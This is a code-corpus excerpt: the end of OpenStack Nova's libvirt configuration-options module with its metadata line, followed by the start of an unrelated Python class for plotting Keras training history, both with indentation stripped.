hypervisor driver to be used within an OpenStack deployment.
Almost all of the libvirt config options are influenced by the ``virt_type``
option, which describes the virtualization type (or so called domain type)
libvirt should use for specific features such as live migration and snapshots.
""")
libvirt_general_opts = [
cfg.StrOpt('rescue_image_id',
help="""
The ID of the image to boot from to rescue data from a corrupted instance.
If the rescue REST API operation doesn't provide an ID of an image to
use, the image which is referenced by this ID is used. If this
option is not set, the image from the instance is used.
Possible values:
* An ID of an image or nothing. If it points to an *Amazon Machine
  Image* (AMI), consider setting the config options ``rescue_kernel_id``
and ``rescue_ramdisk_id`` too. If nothing is set, the image of the instance
is used.
Related options:
* ``rescue_kernel_id``: If the chosen rescue image allows the separate
definition of its kernel disk, the value of this option is used,
if specified. This is the case when *Amazon*'s AMI/AKI/ARI image
format is used for the rescue image.
* ``rescue_ramdisk_id``: If the chosen rescue image allows the separate
definition of its RAM disk, the value of this option is used if,
specified. This is the case when *Amazon*'s AMI/AKI/ARI image
format is used for the rescue image.
"""),
cfg.StrOpt('rescue_kernel_id',
help="""
The ID of the kernel (AKI) image to use with the rescue image.
If the chosen rescue image allows the separate definition of its kernel
disk, the value of this option is used, if specified. This is the case
when *Amazon*'s AMI/AKI/ARI image format is used for the rescue image.
Possible values:
* An ID of a kernel image or nothing. If nothing is specified, the kernel
disk from the instance is used if it was launched with one.
Related options:
* ``rescue_image_id``: If that option points to an image in *Amazon*'s
AMI/AKI/ARI image format, it's useful to use ``rescue_kernel_id`` too.
"""),
cfg.StrOpt('rescue_ramdisk_id',
help="""
The ID of the RAM disk (ARI) image to use with the rescue image.
If the chosen rescue image allows the separate definition of its RAM
disk, the value of this option is used, if specified. This is the case
when *Amazon*'s AMI/AKI/ARI image format is used for the rescue image.
Possible values:
* An ID of a RAM disk image or nothing. If nothing is specified, the RAM
disk from the instance is used if it was launched with one.
Related options:
* ``rescue_image_id``: If that option points to an image in *Amazon*'s
AMI/AKI/ARI image format, it's useful to use ``rescue_ramdisk_id`` too.
"""),
cfg.StrOpt('virt_type',
default='kvm',
choices=('kvm', 'lxc', 'qemu', 'uml', 'xen', 'parallels'),
help="""
Describes the virtualization type (or so called domain type) libvirt should
use.
The choice of this type must match the underlying virtualization strategy
you have chosen for this host.
Possible values:
* See the predefined set of case-sensitive values.
Related options:
* ``connection_uri``: depends on this
* ``disk_prefix``: depends on this
* ``cpu_mode``: depends on this
* ``cpu_model``: depends on this
"""),
cfg.StrOpt('connection_uri',
default='',
help="""
Overrides the default libvirt URI of the chosen virtualization type.
If set, Nova will use this URI to connect to libvirt.
Possible values:
* A URI like ``qemu:///system`` or ``xen+ssh://oirase/`` for example.
  This is only necessary if the URI differs from the commonly known URIs
for the chosen virtualization type.
Related options:
* ``virt_type``: Influences what is used as default value here.
"""),
cfg.BoolOpt('inject_password',
default=False,
help="""
Allow the injection of an admin password for instance only at ``create`` and
``rebuild`` process.
There is no agent needed within the image to do this. If *libguestfs* is
available on the host, it will be used. Otherwise *nbd* is used. The file
system of the image will be mounted and the admin password, which is provided
in the REST API call, will be injected as the password for the root user. If no
root user is available, the instance won't be launched and an error is thrown.
Be aware that the injection is *not* possible when the instance gets launched
from a volume.
Possible values:
* True: Allows the injection.
* False (default): Disallows the injection. Any admin password provided via
  the REST API will be silently ignored.
Related options:
* ``inject_partition``: That option will decide about the discovery and usage
of the file system. It also can disable the injection at all.
"""),
cfg.BoolOpt('inject_key',
default=False,
help="""
Allow the injection of an SSH key at boot time.
There is no agent needed within the image to do this. If *libguestfs* is
available on the host, it will be used. Otherwise *nbd* is used. The file
system of the image will be mounted and the SSH key, which is provided
in the REST API call, will be injected as the SSH key for the root user and
appended to the ``authorized_keys`` of that user. The SELinux context will
be set if necessary. Be aware that the injection is *not* possible when the
instance gets launched from a volume.
This config option will enable directly modifying the instance disk and does
not affect what cloud-init may do using data from config_drive option or the
metadata service.
Related options:
* ``inject_partition``: That option will decide about the discovery and usage
of the file system. It also can disable the injection at all.
"""),
cfg.IntOpt('inject_partition',
default=-2,
min=-2,
help="""
Determines how the file system is chosen for injecting data into it.
*libguestfs* will be used as the first solution to inject data. If that's not
available on the host, the image will be locally mounted on the host as a
fallback solution. If libguestfs is not able to determine the root partition
(because there are more or less than one root partition) or cannot mount the
file system, it will result in an error and the instance won't boot.
Possible values:
* -2 => disable the injection of data.
* -1 => find the root partition with the file system to mount with libguestfs
* 0 => The image is not partitioned
* >0 => The number of the partition to use for the injection
Related options:
* ``inject_key``: Injecting an SSH key only works if ``inject_partition``
  is set to a value greater than or equal to -1.
* ``inject_password``: Injecting an admin password only works if
  ``inject_partition`` is set to a value greater than or equal to -1.
* ``guestfs`` You can enable the debug log level of libguestfs with this
config option. A more verbose output will help in debugging issues.
* ``virt_type``: If you use ``lxc`` as virt_type it will be treated as a
single partition image
"""),
cfg.BoolOpt('use_usb_tablet',
default=True,
deprecated_for_removal=True,
deprecated_reason="This option is being replaced by the "
"'pointer_model' option.",
deprecated_since='14.0.0',
help="""
Enable a mouse cursor within a graphical VNC or SPICE session.
This will only be taken into account if the VM is fully virtualized and VNC
and/or SPICE is enabled. If the node doesn't support a graphical framebuffer,
then it is valid to set this to False.
Related options:
* ``[vnc]enabled``: If VNC is enabled, ``use_usb_tablet`` will have an effect.
* ``[spice]enabled`` + ``[spice].agent_enabled``: If SPICE is enabled and the
spice agent is disabled, the config value of ``use_usb_tablet`` will have
an effect.
"""),
cfg.StrOpt('live_migration_inbound_addr',
help="""
The IP address or hostname to be used as the target for live migration traffic.
If this option is set to None, the hostname of the migration target compute
node will be used.
This option is useful in environments where the live-migration traffic can
impact the network plane significantly. A separate network for live-migration
traffic can then use this config option and avoid the impact on the
management network.
Possible values:
* A valid IP address or hostname, else None.
"""),
# TODO(hieulq): change to URIOpt for validating schemas with next release
# of oslo_config.
cfg.StrOpt('live_migration_uri',
deprecated_for_removal=True,
deprecated_since="15.0.0",
deprecated_reason="""
live_migration_uri is deprecated for removal in favor of two other options that
allow changing the live migration scheme and target URI: ``live_migration_scheme``
and ``live_migration_inbound_addr`` respectively.
""",
help="""
Live migration target URI to use.
Override the default libvirt live migration target URI (which is dependent
on virt_type). Any included "%s" is replaced with the migration target
hostname.
If this option is set to None (which is the default), Nova will automatically
generate the `live_migration_uri` value based on the `virt_type`, but only for
the 3 supported types in the following list:
* 'kvm': 'qemu+tcp://%s/system'
* 'qemu': 'qemu+tcp://%s/system'
* 'xen': 'xenmigr://%s/system'
Related options:
* ``live_migration_inbound_addr``: If ``live_migration_inbound_addr`` value
is not None, the ip/hostname address of target compute node is used instead
of ``live_migration_uri`` as the uri for live migration.
* ``live_migration_scheme``: If ``live_migration_uri`` is not set, the scheme
used for live migration is taken from ``live_migration_scheme`` instead.
"""),
cfg.StrOpt('live_migration_scheme',
help="""
Scheme used for live migration.
Override the default libvirt live migration scheme (which is dependent on
virt_type). If this option is set to None, nova will automatically choose a
sensible default based on the hypervisor. It is not recommended that you change
this unless you are very sure that the hypervisor supports a particular scheme.
Related options:
* ``virt_type``: This option is meaningful only when ``virt_type`` is set to
`kvm` or `qemu`.
* ``live_migration_uri``: If ``live_migration_uri`` value is not None, the
scheme used for live migration is taken from ``live_migration_uri`` instead.
"""),
cfg.BoolOpt('live_migration_tunnelled',
default=False,
help="""
Enable tunnelled migration.
This option enables the tunnelled migration feature, where migration data is
transported over the libvirtd connection. If enabled, we use the
VIR_MIGRATE_TUNNELLED migration flag, avoiding the need to configure
the network to allow direct hypervisor to hypervisor communication.
If False, use the native transport. If not set, Nova will choose a
sensible default based on, for example, the availability of native
encryption support in the hypervisor. Enabling this option will definitely
impact performance massively.
Note that this option is NOT compatible with use of block migration.
Related options:
* Supersedes and (if set) overrides the deprecated 'live_migration_flag' and
'block_migration_flag' to enable tunnelled migration.
"""),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help="""
Maximum bandwidth (in MiB/s) to be used during migration.
If set to 0, the hypervisor will choose a suitable default. Some hypervisors
do not support this feature and will return an error if bandwidth is not 0.
Please refer to the libvirt documentation for further details.
"""),
# TODO(hieulq): Need to add min argument by moving from
# LIVE_MIGRATION_DOWNTIME_MIN constant.
cfg.IntOpt('live_migration_downtime',
default=500,
help="""
Maximum permitted downtime, in milliseconds, for live migration
switchover.
Will be rounded up to a minimum of %dms. You can increase this value
if you want to allow live-migrations to complete faster, or avoid
live-migration timeout errors by allowing the guest to be paused for
longer during the live-migration switchover.
Related options:
* live_migration_completion_timeout
""" % LIVE_MIGRATION_DOWNTIME_MIN),
# TODO(hieulq): Need to add min argument by moving from
# LIVE_MIGRATION_DOWNTIME_STEPS_MIN constant.
cfg.IntOpt('live_migration_downtime_steps',
default=10,
help="""
Number of incremental steps to reach max downtime value.
Will be rounded up to a minimum of %d steps.
""" % LIVE_MIGRATION_DOWNTIME_STEPS_MIN),
# TODO(hieulq): Need to add min argument by moving from
# LIVE_MIGRATION_DOWNTIME_DELAY_MIN constant.
cfg.IntOpt('live_migration_downtime_delay',
default=75,
help="""
Time to wait, in seconds, between each step increase of the migration
downtime.
Minimum delay is %d seconds. Value is per GiB of guest RAM + disk to be
transferred, with lower bound of a minimum of 2 GiB per device.
""" % LIVE_MIGRATION_DOWNTIME_DELAY_MIN),
cfg.IntOpt('live_migration_completion_timeout',
default=800,
mutable=True,
help="""
Time to wait, in seconds, for migration to successfully complete transferring
data before aborting the operation.
Value is per GiB of guest RAM + disk to be transferred, with lower bound of
a minimum of 2 GiB. Should usually be larger than downtime delay * downtime
steps. Set to 0 to disable timeouts.
Related options:
* live_migration_downtime
* live_migration_downtime_steps
* live_migration_downtime_delay
"""),
cfg.IntOpt('live_migration_progress_timeout',
default=0,
deprecated_for_removal=True,
deprecated_reason="Serious bugs found in this feature.",
mutable=True,
help="""
Time to wait, in seconds, for migration to make forward progress in
transferring data before aborting the operation.
Set to 0 to disable timeouts.
This is deprecated, and now disabled by default because we have found serious
bugs in this feature that caused false live-migration timeout failures. This
feature will be removed or replaced in a future release.
"""),
cfg.BoolOpt('live_migration_permit_post_copy',
default=False,
help="""
This option allows nova to switch an on-going live migration to post-copy
mode, i.e., switch the active VM to the one on the destination node before the
migration is complete, thereby ensuring an upper bound on the memory that
needs to be transferred. Post-copy requires libvirt>=1.3.3 and QEMU>=2.5.0.
When permitted, post-copy mode will be automatically activated if a
live-migration memory copy iteration does not make a percentage increase of at
least 10% over the last iteration.
The live-migration force complete API also uses post-copy when permitted. If
post-copy mode is not available, force complete falls back to pausing the VM
to ensure the live-migration operation will complete.
When using post-copy mode, if the source and destination hosts lose network
connectivity, the VM being live-migrated will need to be rebooted. For more
details, please see the Administration guide.
Related options:
* live_migration_permit_auto_converge
"""),
cfg.BoolOpt('live_migration_permit_auto_converge',
default=False,
help="""
This option allows nova to start live migration with auto converge on.
Auto converge throttles down the CPU if the progress of an on-going live
migration is slow. Auto converge will only be used if this flag is set to True and
post copy is not permitted or post copy is unavailable due to the version
of libvirt and QEMU in use. Auto converge requires libvirt>=1.2.3 and
QEMU>=1.6.0.
Related options:
* live_migration_permit_post_copy
"""),
cfg.StrOpt('snapshot_image_format',
choices=('raw', 'qcow2', 'vmdk', 'vdi'),
help="""
Determine the snapshot image format when sending to the image service.
If set, this decides what format is used when sending the snapshot to the
image service.
If not set, defaults to same type as source image.
Possible values:
* ``raw``: RAW disk format
* ``qcow2``: KVM default disk format
* ``vmdk``: VMWare default disk format
* ``vdi``: VirtualBox default disk format
* If not set, defaults to same type as source image.
"""),
cfg.StrOpt('disk_prefix',
help="""
Override the default disk prefix for the devices attached to an instance.
If set, this is used to identify a free disk device name for a bus.
Possible values:
* Any prefix which will result in a valid disk device name like 'sda' or 'hda'
for example. This is only necessary if the device names differ from the
commonly known device name prefixes for a virtualization type such as: sd,
xvd, uvd, vd.
Related options:
* ``virt_type``: Influences which device type is used, which determines
the default disk prefix.
"""),
cfg.IntOpt('wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.StrOpt('cpu_mode',
choices=('host-model', 'host-passthrough', 'custom', 'none'),
help="""
Used to set the CPU mode an instance should have.
If virt_type="kvm|qemu", it will default to "host-model", otherwise it will
default to "none".
Possible values:
* ``host-model``: Clones the host CPU feature flags.
* ``host-passthrough``: Use the host CPU model exactly;
* ``custom``: Use a named CPU model;
* ``none``: Do not set any CPU model.
Related options:
* ``cpu_model``: If ``custom`` is used for ``cpu_mode``, set this config
option too, otherwise this would result in an error and the instance won't
be launched.
"""),
cfg.StrOpt('cpu_model',
help="""
Set the name of the libvirt CPU model the instance should use.
Possible values:
* The names listed in /usr/share/libvirt/cpu_map.xml
Related options:
* ``cpu_mode``: Don't set this when ``cpu_mode`` is NOT set to ``custom``.
Doing so would result in an error and the instance won't be launched.
* ``virt_type``: Only the virtualization types ``kvm`` and ``qemu`` use this.
"""),
cfg.StrOpt('snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g.: file=directsync,block=none'),
cfg.StrOpt('rng_dev_path',
help='A path to a device that will be used as source of '
'entropy on the host. Permitted options are: '
'/dev/random or /dev/hwrng'),
cfg.ListOpt('hw_machine_type',
help='For qemu or KVM guests, set this option to specify '
'a default machine type per host architecture. '
'You can find a list of supported machine types '
'in your environment by checking the output of '
'the "virsh capabilities"command. The format of the '
'value for this config option is host-arch=machine-type. '
'For example: x86_64=machinetype1,armv7l=machinetype2'),
cfg.StrOpt('sysinfo_serial',
default='auto',
choices=('none', 'os', 'hardware', 'auto'),
help='The data source used to populate the host "serial" '
'UUID exposed to guest in the virtual BIOS.'),
cfg.IntOpt('mem_stats_period_seconds',
default=10,
help='A number of seconds for the memory usage statistics period. '
'A zero or negative value disables memory usage '
'statistics.'),
cfg.ListOpt('uid_maps',
default=[],
help='List of uid targets and ranges. '
'Syntax is guest-uid:host-uid:count. '
'Maximum of 5 allowed.'),
cfg.ListOpt('gid_maps',
default=[],
help='List of gid targets and ranges. '
'Syntax is guest-gid:host-gid:count. '
'Maximum of 5 allowed.'),
cfg.IntOpt('realtime_scheduler_priority',
default=1,
help='In a realtime host context, vCPUs for the guest will run at '
'this scheduling priority. Priority depends on the host '
'kernel (usually 1-99).'),
cfg.ListOpt('enabled_perf_events',
default=[],
help="""
This is a performance event list which could be used as a monitor. These events
will be passed to the libvirt domain xml while creating new instances.
Then event statistics data can be collected from libvirt. The minimum
libvirt version is 2.0.0. For more information about `Performance monitoring
events`, refer to https://libvirt.org/formatdomain.html#elementsPerf .
Possible values:
* A string list. For example: ``enabled_perf_events = cmt, mbml, mbmt``
The supported events list can be found in
https://libvirt.org/html/libvirt-libvirt-domain.html ,
where you may need to search for the key words ``VIR_PERF_PARAM_*``
"""),
]
libvirt_imagebackend_opts = [
cfg.StrOpt('images_type',
default='default',
choices=('raw', 'flat', 'qcow2', 'lvm', 'rbd', 'ploop',
'default'),
help="""
VM Images format.
If default is specified, then use_cow_images flag is used instead of this
one.
Related options:
* virt.use_cow_images
* images_volume_group
"""),
cfg.StrOpt('images_volume_group',
help="""
LVM Volume Group that is used for VM images, when you specify images_type=lvm
Related options:
* images_type
"""),
cfg.BoolOpt('sparse_logical_volumes',
default=False,
help="""
Create sparse logical volumes (with virtualsize) if this flag is set to True.
"""),
cfg.StrOpt('images_rbd_pool',
default='rbd',
help='The RADOS pool in which rbd volumes are stored'),
cfg.StrOpt('images_rbd_ceph_conf',
default='', # default determined by librados
help='Path to the ceph configuration file to use'),
cfg.StrOpt('hw_disk_discard',
choices=('ignore', 'unmap'),
help="""
Discard option for nova managed disks.
Requires:
* Libvirt >= 1.0.6
* Qemu >= 1.5 (raw format)
* Qemu >= 1.6 (qcow2 format)
"""),
]
libvirt_imagecache_opts = [
cfg.StrOpt('image_info_filename_pattern',
default='$instances_path/$image_cache_subdirectory_name/'
'%(image)s.info',
deprecated_for_removal=True,
deprecated_since='14.0.0',
deprecated_reason='Image info files are no longer used by the '
'image cache',
help='Allows image information files to be stored in '
'non-standard locations'),
cfg.IntOpt('remove_unused_resized_minimum_age_seconds',
default=3600,
help='Unused resized base images younger than this will not be '
'removed'),
cfg.BoolOpt('checksum_base_images',
default=False,
deprecated_for_removal=True,
deprecated_since='14.0.0',
deprecated_reason='The image cache no longer periodically '
'calculates checksums of stored images. '
'Data integrity can be checked at the block '
'or filesystem level.',
help='Write a checksum for files in _base to disk'),
cfg.IntOpt('checksum_interval_seconds',
default=3600,
deprecated_for_removal=True,
deprecated_since='14.0.0',
deprecated_reason='The image cache no longer periodically '
'calculates checksums of stored images. '
'Data integrity can be checked at the block '
'or filesystem level.',
help='How frequently to checksum base images'),
]
libvirt_lvm_opts = [
cfg.StrOpt('volume_clear',
default='zero',
choices=('none', 'zero', 'shred'),
help="""
Method used to wipe ephemeral disks when they are deleted. Only takes effect
if LVM is set as backing storage.
Possible values:
* none - do not wipe deleted volumes
* zero - overwrite volumes with zeroes
* shred - overwrite volume repeatedly
Related options:
* images_type - must be set to ``lvm``
* volume_clear_size
"""),
cfg.IntOpt('volume_clear_size',
default=0,
min=0,
help="""
Size of area in MiB, counting from the beginning of the allocated volume,
that will be cleared using method set in ``volume_clear`` option.
Possible values:
* 0 - clear whole volume
* >0 - clear specified amount of MiB
Related options:
* images_type - must be set to ``lvm``
* volume_clear - must be set and the value must be different than ``none``
for this option to have any impact
"""),
]
libvirt_utils_opts = [
cfg.BoolOpt('snapshot_compression',
default=False,
help="""
Enable snapshot compression for ``qcow2`` images.
Note: you can set ``snapshot_image_format`` to ``qcow2`` to force all
snapshots to be in ``qcow2`` format, independently from their original image
type.
Related options:
* snapshot_image_format
"""),
]
libvirt_vif_opts = [
cfg.BoolOpt('use_virtio_for_bridges',
default=True,
help='Use virtio for bridge interfaces with KVM/QEMU'),
]
libvirt_volume_opts = [
cfg.ListOpt('qemu_allowed_storage_drivers',
default=[],
help="""
Protocols listed here will be accessed directly from QEMU.
If gluster is present in qemu_allowed_storage_drivers, glusterfs's backend will
pass a disk configuration to QEMU. This allows QEMU to access the volume using
libgfapi rather than mounting GlusterFS via fuse.
Possible values:
* [gluster]
"""),
cfg.BoolOpt('volume_use_multipath',
default=False,
deprecated_name='iscsi_use_multipath',
help="""
Use multipath connection of the iSCSI or FC volume.
Volumes can be connected in LibVirt as multipath devices. This will
provide high availability and fault tolerance.
""")
]
libvirt_volume_aoe_opts = [
cfg.IntOpt('num_aoe_discover_tries',
default=3,
help="""
Number of times to rediscover AoE target to find volume.
Nova provides support for block storage attaching to hosts via AOE (ATA over
Ethernet). This option allows the user to specify the maximum number of retry
attempts that can be made to discover the AoE device.
""")
]
libvirt_volume_glusterfs_opts = [
cfg.StrOpt('glusterfs_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Absolute path to the directory where the glusterfs volume is mounted on the
compute node.
""")
]
# TODO(sneti): This config option is also used for other protocols like
# fibrechannel, scaleio, disco. So this should be renamed to
# num_volume_scan_tries
libvirt_volume_iscsi_opts = [
cfg.IntOpt('num_iscsi_scan_tries',
default=5,
help="""
Number of times to scan iSCSI target to find volume.
"""),
cfg.StrOpt('iscsi_iface',
deprecated_name='iscsi_transport',
help="""
The iSCSI transport iface to use to connect to target in case offload support
is desired.
Default format is of the form <transport_name>.<hwaddress> where
<transport_name> is one of (be2iscsi, bnx2i, cxgb3i, cxgb4i, qla4xxx, ocs) and
<hwaddress> is the MAC address of the interface and can be generated via the
iscsiadm -m iface command. Do not confuse the iscsi_iface parameter to be
provided here with the actual transport name.
""")
# iser is also supported, but use LibvirtISERVolumeDriver
# instead
]
libvirt_volume_iser_opts = [
cfg.IntOpt('num_iser_scan_tries',
default=5,
help="""
Number of times to scan iSER target to find volume.
iSER is a server network protocol that extends iSCSI protocol to use Remote
Direct Memory Access (RDMA). This option allows the user to specify the maximum
number of scan attempts that can be made to find iSER volume.
"""),
cfg.BoolOpt('iser_use_multipath',
default=False,
help="""
Use multipath connection of the iSER volume.
iSER volumes can be connected as multipath devices. This will provide high
availability and fault tolerance.
""")
]
libvirt_volume_net_opts = [
cfg.StrOpt('rbd_user',
help="""
The RADOS client name for accessing rbd (RADOS Block Devices) volumes.
Libvirt will refer to this user when connecting and authenticating with
the Ceph RBD server.
"""),
cfg.StrOpt('rbd_secret_uuid',
help="""
The libvirt UUID of the secret for the rbd_user volumes.
"""),
]
libvirt_volume_nfs_opts = [
cfg.StrOpt('nfs_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the NFS volume is mounted on the compute node.
The default is 'mnt' directory of the location where nova's Python module
is installed.
NFS provides shared storage for the OpenStack Block Storage service.
Possible values:
* A string representing absolute path of mount point.
"""),
cfg.StrOpt('nfs_mount_options',
help="""
Mount options passed to the NFS client. See the nfs man page for details.
Mount options control the way the filesystem is mounted and how the
NFS client behaves when accessing files on this mount point.
Possible values:
* Any string representing mount options separated by commas.
* Example string: vers=3,lookupcache=pos
"""),
]
libvirt_volume_quobyte_opts = [
cfg.StrOpt('quobyte_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the Quobyte volume is mounted on the compute node.
Nova supports the Quobyte volume driver that enables storing Block Storage
service volumes on a Quobyte storage back end. This option specifies the
path of the directory where the Quobyte volume is mounted.
Possible values:
* A string representing absolute path of mount point.
"""),
cfg.StrOpt('quobyte_client_cfg',
help='Path to a Quobyte Client configuration file.'),
]
libvirt_volume_scality_opts = [
cfg.StrOpt('scality_sofs_config',
help="""
Path or URL to the Scality SOFS (Scale-Out File Server) configuration file.
The Scality SOFS provides OpenStack users the option of storing their
data on a high capacity, replicated, highly available Scality Ring object
storage cluster.
"""),
cfg.StrOpt('scality_sofs_mount_point',
default='$state_path/scality',
help="""
Base dir where Scality SOFS shall be mounted.
The Scality volume driver in Nova mounts SOFS and lets the hypervisor access
the volumes.
Possible values:
* $state_path/scality, where state_path is a config option that specifies
the top-level directory for maintaining nova's state, or any string
containing the full directory path.
"""),
]
libvirt_volume_smbfs_opts = [
cfg.StrOpt('smbfs_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the SMBFS shares are mounted on the compute node.
"""),
cfg.StrOpt('smbfs_mount_options',
default='',
help="""
Mount options passed to the SMBFS client.
Provide SMBFS options as a single string containing all parameters.
See mount.cifs man page for details. Note that the libvirt-qemu ``uid``
and ``gid`` must be specified.
"""),
]
libvirt_remotefs_opts = [
cfg.StrOpt('remote_filesystem_transport',
default='ssh',
choices=('ssh', 'rsync'),
help="""
libvirt's transport method for remote file operations.
Because libvirt cannot use RPC to copy files over the network to/from other
compute nodes, another method must be used for:
* creating directory on remote host
* creating file on remote host
* removing file from remote host
* copying file to remote host
""")
]
libvirt_volume_vzstorage_opts = [
cfg.StrOpt('vzstorage_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the Virtuozzo Storage clusters are mounted on the compute
node.
This option defines a non-standard mountpoint for the Vzstorage cluster.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_mount_user',
default='stack',
help="""
Mount owner user name.
This option defines the owner user of Vzstorage cluster mountpoint.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_mount_group',
default='qemu',
help="""
Mount owner group name.
This option defines the owner group of Vzstorage cluster mountpoint.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_mount_perms',
default='0770',
help="""
Mount access mode.
This option defines the access bits of the Vzstorage cluster mountpoint,
in a format similar to that of the chmod(1) utility, for example: 0770.
It consists of one to four digits ranging from 0 to 7, with missing
leading digits assumed to be 0's.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_log_path',
default='/var/log/pstorage/%(cluster_name)s/nova.log.gz',
help="""
Path to vzstorage client log.
This option defines the log of cluster operations,
it should include "%(cluster_name)s" template to separate
logs from multiple shares.
Related options:
* vzstorage_mount_opts may include more detailed logging options.
"""
),
cfg.StrOpt('vzstorage_cache_path',
default=None,
help="""
Path to the SSD cache file.
You can attach an SSD drive to a client and configure the drive to store
a local cache of frequently accessed data. By having a local cache on a
client's SSD drive, you can increase the overall cluster performance by
10 times or more.
WARNING! There are many SSD models which are not server grade and
may lose an arbitrary set of data changes on power loss.
Such SSDs should not be used in Vstorage and are dangerous as they may lead
to data corruption and inconsistencies. Please consult the manual
to learn which SSD models are known to be safe, or verify it using the
vstorage-hwflush-check(1) utility.
This option defines the path which should include "%(cluster_name)s"
template to separate caches from multiple shares.
Related options:
* vzstorage_mount_opts may include more detailed cache options.
"""
),
cfg.ListOpt('vzstorage_mount_opts',
default=[],
help="""
Extra mount options for pstorage-mount
For full description of them, see
https://static.openvz.org/vz-man/man1/pstorage-mount.1.gz.html
The format is a Python string representation of an arguments list, like:
"[\'-v\', \'-R\', \'500\']"
Shouldn\'t include -c, -l, -C, -u, -g and -m as those have
explicit vzstorage_* options.
Related options:
* All other vzstorage_* options
"""
),
]
ALL_OPTS = list(itertools.chain(
libvirt_general_opts,
libvirt_imagebackend_opts,
libvirt_imagecache_opts,
libvirt_lvm_opts,
libvirt_utils_opts,
libvirt_vif_opts,
libvirt_volume_opts,
libvirt_volume_aoe_opts,
libvirt_volume_glusterfs_opts,
libvirt_volume_iscsi_opts,
libvirt_volume_iser_opts,
libvirt_volume_net_opts,
libvirt_volume_nfs_opts,
libvirt_volume_quobyte_opts,
libvirt_volume_scality_opts,
libvirt_volume_smbfs_opts,
libvirt_remotefs_opts,
libvirt_volume_vzstorage_opts,
))
def register_opts(conf):
conf.register_group(libvirt_group)
conf.register_opts(ALL_OPTS, group=libvirt_group)
def list_opts():
return {libvirt_group: ALL_OPTS}
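# A minimal sketch of how these options are usually consumed elsewhere in nova
# (the surrounding code is assumed, not part of this module):
#
#   from nova import conf
#   CONF = conf.CONF
#   if CONF.libvirt.virt_type in ('kvm', 'qemu'):
#       cpu_mode = CONF.libvirt.cpu_mode or 'host-model'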
| nova/conf/libvirt.py | 38,216 | needs:fix_opt_description needs:check_deprecation_status needs:check_opt_group_and_type needs:fix_opt_description_indentation needs:fix_opt_registration_consistency Copyright 2016 OpenStack Foundation All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Downtime period in milliseconds Step count Delay in seconds TODO(hieulq): change to URIOpt for validating schemas with next release of oslo_config. TODO(hieulq): Need to add min argument by moving from LIVE_MIGRATION_DOWNTIME_MIN constant. TODO(hieulq): Need to add min argument by moving from LIVE_MIGRATION_DOWNTIME_STEPS_MIN constant. TODO(hieulq): Need to add min argument by moving from LIVE_MIGRATION_DOWNTIME_DELAY_MIN constant. default determined by librados TODO(sneti): This config option is also used for other protocols like fibrechannel, scaleio, disco. So this should be renamed to num_volume_scan_tries iser is also supported, but use LibvirtISERVolumeDriver instead | 1,453 | en | 0.77009 |
import re
import matplotlib.pyplot as plt
from DatasetHandler.ContentSupport import isNotNone, isNone
from Plotter.SavePlots import PlotSaver
class HistoryPlotter(object):
"""
This class provides a history plotting pipeline using matplotlib.
"""
_using_history:bool = False # This is for a later implemented part of the tool
_path:str = None
_history = None
_history_keys:dict = None
_history_keys_list:list = None
_losses:list = None
_val_losses:list = None
_acc_stdcc_list:list = None
_val_acc_stdcc_list:list = None
_acc_topkcc_list:list = None
_val_acc_topkcc_list:list = None
_learning_rates:list = None
_epochs:int = 0
def __init__(self, model_description:str, path:str = None, history = None, save_it:bool = True, new_style:bool = False):
"""
The class constructor.
Attention: File history plotting is not yet implemented!
:param model_description:str: something to name the image unique and is also the file name
:param path:str: path of a file containing a history
:param history: a history
:param save_it:bool: save the plot instead of showing
:param new_style:bool: desired matplot lib standard or new style
"""
try:
self._model_description = model_description if isNotNone(model_description) else 'undescribed_model'
if isNotNone(path) and isNone(history):
self._path:str = path
self._using_history = False
if isNotNone(history):
self._history = history
self._history_keys = history.history.keys()
self._history_keys_list = list(self._history_keys)
self._using_history = True
self._new_style:bool = new_style
self._save_it:bool = save_it
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.Constructor]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def PlotHistory(self):
"""
This method allows plotting directly from a Keras history.
Plotting from a log file is not yet implemented!
"""
try:
if self._using_history:
if self._new_style:
self.CollectFromHistory()
self.DirectPlotHistory()
else:
self.OldPlotHistory()
#TODO: Log file history plotting is not yet implemented
#else:
# self.PlotHistoryFromLog()
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.PlotHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectAccFromHistory(self, name:str):
"""
This method collects the accuracy data from the history into 2 lists.
:param name:str: name of the used acc metric
"""
try:
acc_list:list = []
val_acc_list:list = []
name = re.sub('val_', '', name)
if name in self._history_keys:
acc_list = [s for s in self._history_keys if (name == s)]
val_acc_list = [s for s in self._history_keys if ('val_'+name == s)]
if isNotNone(acc_list) and isNotNone(val_acc_list):
self._history_keys_list.remove(name)
self._history_keys_list.remove('val_'+name)
print("Found accuracy metrics in history!")
return acc_list, val_acc_list
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectAccFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
